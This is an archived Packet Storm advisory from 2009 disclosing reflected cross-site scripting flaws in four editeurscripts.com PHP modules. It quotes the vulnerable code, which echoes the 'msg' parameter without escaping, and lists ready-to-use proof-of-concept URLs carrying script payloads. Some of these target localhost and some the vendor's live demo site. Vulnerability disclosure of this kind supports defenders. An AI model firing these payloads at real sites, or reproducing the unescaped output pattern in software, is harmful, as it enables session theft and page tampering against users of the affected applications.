what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

editeurscripts.com Cross Site Scripting

editeurscripts.com Cross Site Scripting
Posted Mar 12, 2009
Authored by Jonathan Salwan | Site shell-storm.org

Multiple modules from editeurscripts.com suffer from cross site scripting vulnerabilities.These include EsContacts version 1.0, EsBaseAdmin version 2.1, EsPartenaires version 1.0, and EsNews version 1.2.

tags | exploit, vulnerability, xss
SHA-256 | e4a77e182ebd28e3bcdd28d8554e8d48021f0e44f50f3e23fe007cc32c2ac2cd

editeurscripts.com Cross Site Scripting

Change Mirror Download
#
# Multiple modules XSS vulnerability with the authors editeurscripts.com
# Modules Vulnerable:
# -EScontacts v1.0
# -EsBaseAdmin v2.1
# -EsPartenaires v1.0
# -EsNews v1.2
#
#
# Author: Jonathan Salwan
# Mail : submit [AT] shell-storm.org
# Web : http://www.shell-storm.org
#
# For the 4 modules, the codes were identical.
#
#
# [...]
# if ($_GET["msg"] != "")
# {
# $msg = str_replace("+"," ",$_GET["msg"]);
# $msg = stripslashes($msg);
# echo("<div align=\"center\" class=\"alert\">$msg</div><br />");
# }
# [...]
#
#
# Use Vulnerability:
# ------------------
#
# EsContacts v1.0 => http://localhost/EsContacts/login.php?msg=<script>alert('xss');</script>
#
# EsBaseAdmin v2.1 => http://localhost/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27a%27);%3C/script%3E
# Live Demo => http://demo.editeurscripts.com/EsBaseAdmin/default/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
#
# EsPartenaires v1.0 => http://localhost/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
# Live Demo => http://demo.editeurscripts.com/EsPartenaires/login.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
#
#
# EsNews v1.2 => http://localhost/EsNews/admin/news/modifier.php?msg=%3Cscript%3Ealert(%27xss%27);%3C/script%3E
# (not need to be administrator)
#
#
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close